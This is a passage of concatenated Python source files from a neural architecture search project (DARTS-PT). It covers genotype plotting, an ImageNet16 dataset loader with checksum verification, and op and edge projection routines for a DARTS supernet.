    graph.render(filename, view=False)
def plot(genotype, filename):
    """Render a supernet genotype (one op per edge) as a PDF.

    Non-skip operations are drawn in red; edge ids are resolved to node
    pairs through the module-level `supernet_dict`.
    """
    graph = Digraph(
        format='pdf',
        edge_attr=dict(fontsize='100', fontname="times"),
        node_attr=dict(style='filled', shape='rect', align='center', fontsize='100', height='0.5', width='0.5',
                       penwidth='2', fontname="times"),
        engine='dot')
    graph.body.extend(['rankdir=LR'])
    graph.body.extend(['ratio=0.3'])
    graph.node("c_{k-2}", fillcolor='darkseagreen2')
    graph.node("c_{k-1}", fillcolor='darkseagreen2')
    for node_id in range(steps):
        graph.node(str(node_id), fillcolor='lightblue')
    for eid, op in enumerate(genotype):
        src, dst = supernet_dict[eid]
        if op == 'skip_connect':
            graph.edge(src, dst, label=op, fillcolor="gray")
        else:
            # Highlight "real" operations so they stand out from skips.
            graph.edge(src, dst, label=op, fillcolor="gray", color='red', fontcolor='red')
    graph.node("c_{k}", fillcolor='palegoldenrod')
    for node_id in range(steps):
        graph.edge(str(node_id), "c_{k}", fillcolor="gray")
    graph.render(filename, view=False)
# def plot(genotype, filename):
# g = Digraph(
# format='pdf',
# edge_attr=dict(fontsize='100', fontname="times", penwidth='3'),
# node_attr=dict(style='filled', shape='rect', align='center', fontsize='100', height='0.5', width='0.5',
# penwidth='2', fontname="times"),
# engine='dot')
# g.body.extend(['rankdir=LR'])
# g.node("c_{k-2}", fillcolor='darkseagreen2')
# g.node("c_{k-1}", fillcolor='darkseagreen2')
# num_edges = len(genotype)
# for i in range(steps):
# g.node(str(i), fillcolor='lightblue')
# for eid in range(num_edges):
# op = genotype[eid]
# u, v = supernet_dict[eid]
# if op != 'skip_connect':
# g.edge(u, v, label=op, fillcolor="gray", color='red', fontcolor='red')
# else:
# g.edge(u, v, label=op, fillcolor="gray")
# g.node("c_{k}", fillcolor='palegoldenrod')
# for i in range(steps):
# g.edge(str(i), "c_{k}", fillcolor="gray")
# g.render(filename, view=False)
if __name__ == '__main__':
    #### visualize the supernet ####
    # Usage: python visualize_full.py ARCH_NAME, where ARCH_NAME is a
    # supernet genotype defined in genotypes.py.
    if len(sys.argv) != 2:
        print("usage:\n python {} ARCH_NAME".format(sys.argv[0]))
        sys.exit(1)
    genotype_name = sys.argv[1]
    assert 'supernet' in genotype_name, 'this script only supports supernet visualization'
    # getattr instead of eval: never execute code built from argv; an unknown
    # name still raises AttributeError exactly like the attribute lookup did.
    try:
        genotype = getattr(genotypes, genotype_name)
    except AttributeError:
        print("{} is not specified in genotypes.py".format(genotype_name))
        sys.exit(1)
    path = '../../figs/genotypes/cnn_supernet_cue/'
    plot(genotype.normal, path + genotype_name + "_normal")
    plot(genotype.reduce, path + genotype_name + "_reduce")
|
zhengjian2322/darts-pt | nasbench201/DownsampledImageNet.py | <reponame>zhengjian2322/darts-pt
import os, sys, hashlib, torch
import numpy as np
from PIL import Image
import torch.utils.data as data
import pickle
def calculate_md5(fpath, chunk_size=1024 * 1024):
    """Return the hex MD5 digest of the file at *fpath*, read in *chunk_size* pieces."""
    digest = hashlib.md5()
    with open(fpath, 'rb') as stream:
        while True:
            block = stream.read(chunk_size)
            if not block:  # EOF
                break
            digest.update(block)
    return digest.hexdigest()
def check_md5(fpath, md5, **kwargs):
    """Return True when the MD5 digest of *fpath* equals *md5* (kwargs go to calculate_md5)."""
    actual = calculate_md5(fpath, **kwargs)
    return actual == md5
def check_integrity(fpath, md5=None):
    """Return True iff *fpath* is an existing file and, when *md5* is given, matches it."""
    if not os.path.isfile(fpath):
        return False
    # Without an expected checksum, existence alone counts as intact.
    return True if md5 is None else check_md5(fpath, md5)
class ImageNet16(data.Dataset):
    """Downsampled ImageNet (16x16) dataset stored as CIFAR-style pickled batches.

    Loads the pre-downloaded batch files found in *root*, verifying each file
    against its expected MD5 checksum before reading it.
    """
    # http://image-net.org/download-images
    # A Downsampled Variant of ImageNet as an Alternative to the CIFAR datasets
    # https://arxiv.org/pdf/1707.08819.pdf
    # (filename, expected-md5) pairs for the ten training batches.
    train_list = [
        ['train_data_batch_1', '27846dcaa50de8e21a7d1a35f30f0e91'],
        ['train_data_batch_2', 'c7254a054e0e795c69120a5727050e3f'],
        ['train_data_batch_3', '4333d3df2e5ffb114b05d2ffc19b1e87'],
        ['train_data_batch_4', '1620cdf193304f4a92677b695d70d10f'],
        ['train_data_batch_5', '348b3c2fdbb3940c4e9e834affd3b18d'],
        ['train_data_batch_6', '6e765307c242a1b3d7d5ef9139b48945'],
        ['train_data_batch_7', '564926d8cbf8fc4818ba23d2faac7564'],
        ['train_data_batch_8', 'f4755871f718ccb653440b9dd0ebac66'],
        ['train_data_batch_9', 'bb6dd660c38c58552125b1a92f86b5d4'],
        ['train_data_batch_10', '8f03f34ac4b42271a294f91bf480f29b'],
    ]
    # (filename, expected-md5) pair for the validation split.
    valid_list = [
        ['val_data', '3410e3017fdaefba8d5073aaa65e4bd6'],
    ]
    def __init__(self, root, train, transform, use_num_of_class_only=None):
        """
        Args:
            root: directory containing the batch files listed above.
            train: True -> training split, False -> validation split.
            transform: optional PIL-image transform applied in __getitem__.
            use_num_of_class_only: if given (1..999), keep only the samples
                whose on-disk label lies in [1, use_num_of_class_only].

        Raises:
            RuntimeError: if any expected batch file is missing or fails
                its MD5 check.
        """
        self.root = root
        self.transform = transform
        self.train = train  # training set or valid set
        if not self._check_integrity(): raise RuntimeError('Dataset not found or corrupted.')
        if self.train:
            downloaded_list = self.train_list
        else:
            downloaded_list = self.valid_list
        self.data = []
        self.targets = []
        # now load the picked numpy arrays
        # NOTE(review): pickle.load on local batch files — acceptable only
        # because their MD5s were just verified; do not point `root` at
        # untrusted data.
        for i, (file_name, checksum) in enumerate(downloaded_list):
            file_path = os.path.join(self.root, file_name)
            # print ('Load {:}/{:02d}-th : {:}'.format(i, len(downloaded_list), file_path))
            with open(file_path, 'rb') as f:
                # latin1 encoding is needed to read Python-2 pickles under Python 3.
                if sys.version_info[0] == 2:
                    entry = pickle.load(f)
                else:
                    entry = pickle.load(f, encoding='latin1')
                self.data.append(entry['data'])
                self.targets.extend(entry['labels'])
        # Flat rows -> (N, 3, 16, 16), then to HWC for PIL.
        self.data = np.vstack(self.data).reshape(-1, 3, 16, 16)
        self.data = self.data.transpose((0, 2, 3, 1))  # convert to HWC
        if use_num_of_class_only is not None:
            assert isinstance(use_num_of_class_only,
                              int) and use_num_of_class_only > 0 and use_num_of_class_only < 1000, 'invalid use_num_of_class_only : {:}'.format(
                use_num_of_class_only)
            # Keep only samples of the first `use_num_of_class_only` classes
            # (labels on disk are 1-based).
            new_data, new_targets = [], []
            for I, L in zip(self.data, self.targets):
                if 1 <= L <= use_num_of_class_only:
                    new_data.append(I)
                    new_targets.append(L)
            self.data = new_data
            self.targets = new_targets
        # self.mean.append(entry['mean'])
        # self.mean = np.vstack(self.mean).reshape(-1, 3, 16, 16)
        # self.mean = np.mean(np.mean(np.mean(self.mean, axis=0), axis=1), axis=1)
        # print ('Mean : {:}'.format(self.mean))
        # temp = self.data - np.reshape(self.mean, (1, 1, 1, 3))
        # std_data = np.std(temp, axis=0)
        # std_data = np.mean(np.mean(std_data, axis=0), axis=0)
        # print ('Std : {:}'.format(std_data))
    def __getitem__(self, index):
        """Return (transformed image, 0-based label) for sample *index*."""
        # Labels are stored 1-based on disk; shift to 0-based here.
        img, target = self.data[index], self.targets[index] - 1
        img = Image.fromarray(img)
        if self.transform is not None:
            img = self.transform(img)
        return img, target
    def __len__(self):
        return len(self.data)
    def _check_integrity(self):
        """Return True iff every expected batch file exists and matches its MD5."""
        root = self.root
        for fentry in (self.train_list + self.valid_list):
            filename, md5 = fentry[0], fentry[1]
            fpath = os.path.join(root, filename)
            if not check_integrity(fpath, md5):
                return False
        return True
|
zhengjian2322/darts-pt | sota/cnn/projection.py | import os
import sys
sys.path.insert(0, '../../')
import numpy as np
import torch
import nasbench201.utils as ig_utils
import logging
import torch.utils
from copy import deepcopy
torch.set_printoptions(precision=4, sci_mode=False)
def project_op(model, proj_queue, args, infer, cell_type, selected_eid=None):
    '''Operation discretization: pick one edge and the best op on it.

    An operation is judged "best" by masking it out on the selected edge and
    evaluating the remaining supernet: the op whose removal degrades the
    network most (highest loss / lowest accuracy) wins.

    Args:
        model: supernet exposing num_edges / num_ops / candidate_flags and
            get_projected_weights(cell_type).
        proj_queue: data loader used to evaluate each candidate projection.
        args: needs args.proj_crit[cell_type] in {'loss', 'acc'} and
            args.edge_decision == 'random'.
        infer: evaluation fn returning (acc, loss) stats.
        cell_type: 'normal' or 'reduce'.
        selected_eid: optionally force which edge to project.

    Returns:
        (selected_eid, best_opid)

    Raises:
        ValueError: on an unsupported edge_decision or proj_crit (the
            original code crashed later with a confusing NameError instead).
    '''
    #### macros
    num_edges, num_ops = model.num_edges, model.num_ops
    candidate_flags = model.candidate_flags[cell_type]
    proj_crit = args.proj_crit[cell_type]
    #### select an edge
    if selected_eid is None:
        remain_eids = torch.nonzero(candidate_flags).cpu().numpy().T[0]
        if args.edge_decision == "random":
            selected_eid = np.random.choice(remain_eids, size=1)[0]
        else:
            # fail fast instead of continuing with selected_eid == None
            raise ValueError('unsupported edge_decision: {}'.format(args.edge_decision))
    logging.info('selected edge: %d %s', selected_eid, cell_type)
    #### select the best operation
    if proj_crit == 'loss':
        crit_idx = 1
        compare = lambda x, y: x > y
    elif proj_crit == 'acc':
        crit_idx = 0
        compare = lambda x, y: x < y
    else:
        # previously fell through and raised NameError on crit_idx below
        raise ValueError('unsupported proj_crit: {}'.format(proj_crit))
    best_opid = 0
    crit_extrema = None
    for opid in range(num_ops):
        ## projection: zero out op `opid` on the selected edge and evaluate the rest
        weights = model.get_projected_weights(cell_type)
        proj_mask = torch.ones_like(weights[selected_eid])
        proj_mask[opid] = 0
        weights[selected_eid] = weights[selected_eid] * proj_mask
        ## proj evaluation
        weights_dict = {cell_type: weights}
        valid_stats = infer(proj_queue, model, log=False, _eval=False, weights_dict=weights_dict)
        crit = valid_stats[crit_idx]
        if crit_extrema is None or compare(crit, crit_extrema):
            crit_extrema = crit
            best_opid = opid
        logging.info('valid_acc %f', valid_stats[0])
        logging.info('valid_loss %f', valid_stats[1])
    #### project
    logging.info('best opid: %d', best_opid)
    return selected_eid, best_opid
def project_edge(model, proj_queue, args, infer, cell_type):
    '''Topology discretization: pick a node and keep its top-2 input edges.

    Edges are dropped one at a time: zeroing an edge and evaluating the
    supernet; the edge whose removal hurts least is discarded, until two
    remain.

    Args:
        model: supernet exposing candidate_flags_edge, nid2eids and
            get_projected_weights(cell_type).
        proj_queue: data loader used to evaluate each candidate projection.
        args: needs args.proj_crit[cell_type] in {'loss', 'acc'} and
            args.edge_decision == 'random'.
        infer: evaluation fn returning (acc, loss) stats.
        cell_type: 'normal' or 'reduce'.

    Returns:
        (selected_nid, eids) — the projected node and its two kept edges.

    Raises:
        ValueError: on an unsupported edge_decision or proj_crit (the
            original code crashed later with a confusing NameError instead).
    '''
    #### macros
    candidate_flags = model.candidate_flags_edge[cell_type]
    proj_crit = args.proj_crit[cell_type]
    #### select a node whose input edges are still undecided
    remain_nids = torch.nonzero(candidate_flags).cpu().numpy().T[0]
    if args.edge_decision == "random":
        selected_nid = np.random.choice(remain_nids, size=1)[0]
    else:
        # fail fast instead of continuing with selected_nid undefined
        raise ValueError('unsupported edge_decision: {}'.format(args.edge_decision))
    logging.info('selected node: %d %s', selected_nid, cell_type)
    #### select top2 edges
    if proj_crit == 'loss':
        crit_idx = 1
        compare = lambda x, y: x > y
    elif proj_crit == 'acc':
        crit_idx = 0
        compare = lambda x, y: x < y
    else:
        # previously fell through and raised NameError on crit_idx below
        raise ValueError('unsupported proj_crit: {}'.format(proj_crit))
    eids = deepcopy(model.nid2eids[selected_nid])
    while len(eids) > 2:
        eid_todel = None
        crit_extrema = None
        for eid in eids:
            # zero this edge and evaluate the resulting supernet
            weights = model.get_projected_weights(cell_type)
            weights[eid].data.fill_(0)
            weights_dict = {cell_type: weights}
            ## proj evaluation
            valid_stats = infer(proj_queue, model, log=False, _eval=False, weights_dict=weights_dict)
            crit = valid_stats[crit_idx]
            if crit_extrema is None or not compare(crit, crit_extrema):  # find out bad edges
                crit_extrema = crit
                eid_todel = eid
            logging.info('valid_acc %f', valid_stats[0])
            logging.info('valid_loss %f', valid_stats[1])
        eids.remove(eid_todel)
    #### project
    logging.info('top2 edges: (%d, %d)', eids[0], eids[1])
    return selected_nid, eids
def pt_project(train_queue, valid_queue, model, architect, optimizer,
               epoch, args, infer, perturb_alpha, epsilon_alpha):
    """Run the DARTS-PT projection phase: alternately project (discretize)
    one op/edge decision and fine-tune the supernet between projections.

    Args:
        train_queue / valid_queue: training and validation data loaders;
            valid_queue doubles as the projection-evaluation queue.
        model: projection supernet (DartsNetworkProj-style interface).
        architect: architecture optimizer wrapper.
        optimizer: weight optimizer (used here only for zero_grad).
        epoch: NOTE(review) — this parameter is shadowed by the tuning-loop
            variable below and is otherwise unused.
        args: run configuration (proj_intv, learning rates, checkpoints, ...).
        infer: evaluation fn returning (acc, loss).
        perturb_alpha, epsilon_alpha: SDARTS perturbation fn and magnitude;
            perturb_alpha may be falsy to disable perturbation.
    """
    model.train()
    model.printing(logging)
    # Baseline metrics before any projection.
    train_acc, train_obj = infer(train_queue, model, log=False)
    logging.info('train_acc %f', train_acc)
    logging.info('train_loss %f', train_obj)
    valid_acc, valid_obj = infer(valid_queue, model, log=False)
    logging.info('valid_acc %f', valid_acc)
    logging.info('valid_loss %f', valid_obj)
    objs = ig_utils.AvgrageMeter()
    top1 = ig_utils.AvgrageMeter()
    top5 = ig_utils.AvgrageMeter()
    #### macros
    # One projection per edge (op choice) plus one per node (topology choice).
    num_projs = model.num_edges + len(model.nid2eids.keys()) - 1  ## -1 because we project at both epoch 0 and -1
    tune_epochs = args.proj_intv * num_projs + 1
    proj_intv = args.proj_intv
    args.proj_crit = {'normal': args.proj_crit_normal, 'reduce': args.proj_crit_reduce}
    proj_queue = valid_queue
    #### reset optimizer
    # Fine-tuning uses a 10x smaller LR than the search phase.
    model.reset_optimizer(args.learning_rate / 10, args.momentum, args.weight_decay)
    scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
        model.optimizer, float(tune_epochs), eta_min=args.learning_rate_min)
    #### load proj checkpoints
    start_epoch = 0
    if args.dev_resume_epoch >= 0:
        filename = os.path.join(args.dev_resume_checkpoint_dir, 'checkpoint_{}.pth.tar'.format(args.dev_resume_epoch))
        if os.path.isfile(filename):
            logging.info("=> loading projection checkpoint '{}'".format(filename))
            checkpoint = torch.load(filename, map_location='cpu')
            start_epoch = checkpoint['epoch']
            model.set_state_dict(architect, scheduler, checkpoint)
            model.set_arch_parameters(checkpoint['alpha'])
            scheduler.load_state_dict(checkpoint['scheduler'])
            model.optimizer.load_state_dict(checkpoint['optimizer'])  # optimizer
        else:
            logging.info("=> no checkpoint found at '{}'".format(filename))
            exit(0)
    #### projecting and tuning
    for epoch in range(start_epoch, tune_epochs):
        logging.info('epoch %d', epoch)
        ## project once every proj_intv epochs (and at the final epoch)
        if epoch % proj_intv == 0 or epoch == tune_epochs - 1:
            ## saving every projection
            save_state_dict = model.get_state_dict(epoch, architect, scheduler)
            ig_utils.save_checkpoint(save_state_dict, False, args.dev_save_checkpoint_dir, per_epoch=True)
            # First project all op choices (one edge per projection round),
            # then move on to topology (edge) choices.
            if epoch < proj_intv * model.num_edges:
                logging.info('project op')
                selected_eid_normal, best_opid_normal = project_op(model, proj_queue, args, infer, cell_type='normal')
                model.project_op(selected_eid_normal, best_opid_normal, cell_type='normal')
                selected_eid_reduce, best_opid_reduce = project_op(model, proj_queue, args, infer, cell_type='reduce')
                model.project_op(selected_eid_reduce, best_opid_reduce, cell_type='reduce')
                model.printing(logging)
            else:
                logging.info('project edge')
                selected_nid_normal, eids_normal = project_edge(model, proj_queue, args, infer, cell_type='normal')
                model.project_edge(selected_nid_normal, eids_normal, cell_type='normal')
                selected_nid_reduce, eids_reduce = project_edge(model, proj_queue, args, infer, cell_type='reduce')
                model.project_edge(selected_nid_reduce, eids_reduce, cell_type='reduce')
                model.printing(logging)
        ## tune
        for step, (input, target) in enumerate(train_queue):
            model.train()
            n = input.size(0)
            ## fetch data
            input = input.cuda()
            target = target.cuda(non_blocking=True)
            input_search, target_search = next(iter(valid_queue))
            input_search = input_search.cuda()
            target_search = target_search.cuda(non_blocking=True)
            ## train alpha
            optimizer.zero_grad();
            architect.optimizer.zero_grad()
            architect.step(input, target, input_search, target_search,
                           return_logits=True)
            ## sdarts
            if perturb_alpha:
                # transform arch_parameters to prob (for perturbation)
                model.softmax_arch_parameters()
                optimizer.zero_grad();
                architect.optimizer.zero_grad()
                perturb_alpha(model, input, target, epsilon_alpha)
            ## train weight
            optimizer.zero_grad();
            architect.optimizer.zero_grad()
            logits, loss = model.step(input, target, args)
            ## sdarts
            if perturb_alpha:
                ## restore alpha to unperturbed arch_parameters
                model.restore_arch_parameters()
            ## logging
            prec1, prec5 = ig_utils.accuracy(logits, target, topk=(1, 5))
            objs.update(loss.data, n)
            top1.update(prec1.data, n)
            top5.update(prec5.data, n)
            if step % args.report_freq == 0:
                logging.info('train %03d %e %f %f', step, objs.avg, top1.avg, top5.avg)
            if args.fast:
                break
        ## one epoch end
        model.printing(logging)
        train_acc, train_obj = infer(train_queue, model, log=False)
        logging.info('train_acc %f', train_acc)
        logging.info('train_loss %f', train_obj)
        valid_acc, valid_obj = infer(valid_queue, model, log=False)
        logging.info('valid_acc %f', valid_acc)
        logging.info('valid_loss %f', valid_obj)
    # NOTE(review): `scheduler` is never stepped in this visible code —
    # presumably model.step() advances it internally; verify.
    logging.info('projection finished')
    model.printing(logging)
    num_params = ig_utils.count_parameters_in_Compact(model)
    genotype = model.genotype()
    logging.info('param size = %f', num_params)
    logging.info('genotype = %s', genotype)
    return
|
zhengjian2322/darts-pt | sota/cnn/model_search_darts_proj.py | import torch
from copy import deepcopy
from sota.cnn.operations import *
from sota.cnn.genotypes import Genotype
import sys
sys.path.insert(0, '../../')
from sota.cnn.model_search import Network
class DartsNetworkProj(Network):
    """DARTS supernet extended with op/edge projection state (DARTS-PT).

    Per cell type ('normal' / 'reduce') it tracks:
      - candidate_flags: which of the num_edges edges still need an op choice,
      - candidate_flags_edge: which of the 3 later nodes still need their
        top-2 input edges selected,
      - proj_weights: hard 0/1 weight rows written once a decision is made.
    """
    def __init__(self, C, num_classes, layers, criterion, primitives, args,
                 steps=4, multiplier=4, stem_multiplier=3, drop_path_prob=0.0):
        super(DartsNetworkProj, self).__init__(C, num_classes, layers, criterion, primitives, args,
                                               steps=steps, multiplier=multiplier, stem_multiplier=stem_multiplier,
                                               drop_path_prob=drop_path_prob)
        self._initialize_flags()
        self._initialize_proj_weights()
        self._initialize_topology_dicts()
    #### proj flags
    def _initialize_topology_dicts(self):
        # nid2eids: node id -> ids of its candidate input edges. Edges 0-1
        # (the first intermediate node's two inputs) are not subject to
        # topology selection, so they do not appear here.
        self.nid2eids = {0: [2, 3, 4], 1: [5, 6, 7, 8], 2: [9, 10, 11, 12, 13]}
        # nid2selected_eids: per cell type, the top-2 edges kept per node
        # (filled in by project_edge).
        self.nid2selected_eids = {
            'normal': {0: [], 1: [], 2: []},
            'reduce': {0: [], 1: [], 2: []},
        }
    def _initialize_flags(self):
        # True = decision still pending for that edge / node.
        self.candidate_flags = {
            'normal': torch.tensor(self.num_edges * [True], requires_grad=False, dtype=torch.bool).cuda(),
            'reduce': torch.tensor(self.num_edges * [True], requires_grad=False, dtype=torch.bool).cuda(),
        }  # must be in this order
        self.candidate_flags_edge = {
            'normal': torch.tensor(3 * [True], requires_grad=False, dtype=torch.bool).cuda(),
            'reduce': torch.tensor(3 * [True], requires_grad=False, dtype=torch.bool).cuda(),
        }
    def _initialize_proj_weights(self):
        ''' data structures used for proj '''
        # Alphas may be kept as a list of per-edge tensors or one stacked
        # tensor, depending on the parent Network; normalize to a tensor
        # shape for the zero-initialized projection buffers.
        if isinstance(self.alphas_normal, list):
            alphas_normal = torch.stack(self.alphas_normal, dim=0)
            alphas_reduce = torch.stack(self.alphas_reduce, dim=0)
        else:
            alphas_normal = self.alphas_normal
            alphas_reduce = self.alphas_reduce
        self.proj_weights = {  # for hard/soft assignment after project
            'normal': torch.zeros_like(alphas_normal),
            'reduce': torch.zeros_like(alphas_reduce),
        }
    #### proj function
    def project_op(self, eid, opid, cell_type):
        """Fix edge *eid* to operation *opid* (one-hot) for *cell_type*."""
        self.proj_weights[cell_type][eid][opid] = 1  ## hard by default
        self.candidate_flags[cell_type][eid] = False
    def project_edge(self, nid, eids, cell_type):
        """Keep only input edges *eids* for node *nid*; zero out the rest."""
        for eid in self.nid2eids[nid]:
            if eid not in eids:  # not top2
                self.proj_weights[cell_type][eid].data.fill_(0)
        self.nid2selected_eids[cell_type][nid] = deepcopy(eids)
        self.candidate_flags_edge[cell_type][nid] = False
    #### critical function
    def get_projected_weights(self, cell_type):
        ''' used in forward and genotype '''
        # Start from the softmaxed alphas, then overwrite every row whose
        # op or topology decision has already been made with its hard
        # proj_weights value.
        weights = self.get_softmax()[cell_type]
        ## proj op
        for eid in range(self.num_edges):
            if not self.candidate_flags[cell_type][eid]:
                weights[eid].data.copy_(self.proj_weights[cell_type][eid])
        ## proj edge
        for nid in self.nid2eids:
            if not self.candidate_flags_edge[cell_type][nid]:  ## projected node
                for eid in self.nid2eids[nid]:
                    if eid not in self.nid2selected_eids[cell_type][nid]:
                        weights[eid].data.copy_(self.proj_weights[cell_type][eid])
        return weights
    def forward(self, input, weights_dict=None):
        """Forward pass using projected weights, unless *weights_dict*
        supplies an explicit override per cell type (used during projection
        evaluation)."""
        if weights_dict is None or 'normal' not in weights_dict:
            weights_normal = self.get_projected_weights('normal')
        else:
            weights_normal = weights_dict['normal']
        if weights_dict is None or 'reduce' not in weights_dict:
            weights_reduce = self.get_projected_weights('reduce')
        else:
            weights_reduce = weights_dict['reduce']
        s0 = s1 = self.stem(input)
        for i, cell in enumerate(self.cells):
            if cell.reduction:
                weights = weights_reduce
            else:
                weights = weights_normal
            s0, s1 = s1, cell(s0, s1, weights, self.drop_path_prob)
        out = self.global_pooling(s1)
        logits = self.classifier(out.view(out.size(0), -1))
        return logits
    #### utils
    def printing(self, logging, option='all'):
        """Log the current projected weight matrices ('normal', 'reduce' or 'all')."""
        weights_normal = self.get_projected_weights('normal')
        weights_reduce = self.get_projected_weights('reduce')
        if option in ['all', 'normal']:
            logging.info('\n%s', weights_normal)
        if option in ['all', 'reduce']:
            logging.info('\n%s', weights_reduce)
    def genotype(self):
        """Derive the discrete Genotype from the current projected weights."""
        def _parse(weights, normal=True):
            # For each node, keep the top-2 input edges ranked by their best
            # non-'none' op weight, then pick that best op on each kept edge.
            PRIMITIVES = self.PRIMITIVES['primitives_normal' if normal else 'primitives_reduct']
            gene = []
            n = 2
            start = 0
            for i in range(self._steps):
                end = start + n
                W = weights[start:end].copy()
                try:
                    edges = sorted(range(i + 2), key=lambda x: -max(
                        W[x][k] for k in range(len(W[x])) if k != PRIMITIVES[x].index('none')))[:2]
                except ValueError:
                    # 'none' is not in this primitive set; rank by plain max.
                    edges = sorted(range(i + 2), key=lambda x: -max(W[x][k] for k in range(len(W[x]))))[:2]
                for j in edges:
                    k_best = None
                    for k in range(len(W[j])):
                        if 'none' in PRIMITIVES[j]:
                            if k != PRIMITIVES[j].index('none'):
                                if k_best is None or W[j][k] > W[j][k_best]:
                                    k_best = k
                        else:
                            if k_best is None or W[j][k] > W[j][k_best]:
                                k_best = k
                    gene.append((PRIMITIVES[start + j][k_best], j))
                start = end
                n += 1
            return gene
        weights_normal = self.get_projected_weights('normal')
        weights_reduce = self.get_projected_weights('reduce')
        gene_normal = _parse(weights_normal.data.cpu().numpy(), True)
        gene_reduce = _parse(weights_reduce.data.cpu().numpy(), False)
        concat = range(2 + self._steps - self._multiplier, self._steps + 2)
        genotype = Genotype(
            normal=gene_normal, normal_concat=concat,
            reduce=gene_reduce, reduce_concat=concat
        )
        return genotype
    def get_state_dict(self, epoch, architect, scheduler):
        """Bundle model, optimizer, scheduler and projection state for checkpointing."""
        model_state_dict = {
            'epoch': epoch,  ## no +1 because we are saving before projection / at the beginning of an epoch
            'state_dict': self.state_dict(),
            'alpha': self.arch_parameters(),
            'optimizer': self.optimizer.state_dict(),
            'arch_optimizer': architect.optimizer.state_dict(),
            'scheduler': scheduler.state_dict(),
            #### projection
            'nid2eids': self.nid2eids,
            'nid2selected_eids': self.nid2selected_eids,
            'candidate_flags': self.candidate_flags,
            'candidate_flags_edge': self.candidate_flags_edge,
            'proj_weights': self.proj_weights,
        }
        return model_state_dict
    def set_state_dict(self, architect, scheduler, checkpoint):
        """Restore everything saved by get_state_dict from *checkpoint*."""
        #### common
        self.load_state_dict(checkpoint['state_dict'])
        self.set_arch_parameters(checkpoint['alpha'])
        self.optimizer.load_state_dict(checkpoint['optimizer'])
        architect.optimizer.load_state_dict(checkpoint['arch_optimizer'])
        scheduler.load_state_dict(checkpoint['scheduler'])
        #### projection
        self.nid2eids = checkpoint['nid2eids']
        self.nid2selected_eids = checkpoint['nid2selected_eids']
        self.candidate_flags = checkpoint['candidate_flags']
        self.candidate_flags_edge = checkpoint['candidate_flags_edge']
        self.proj_weights = checkpoint['proj_weights']
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.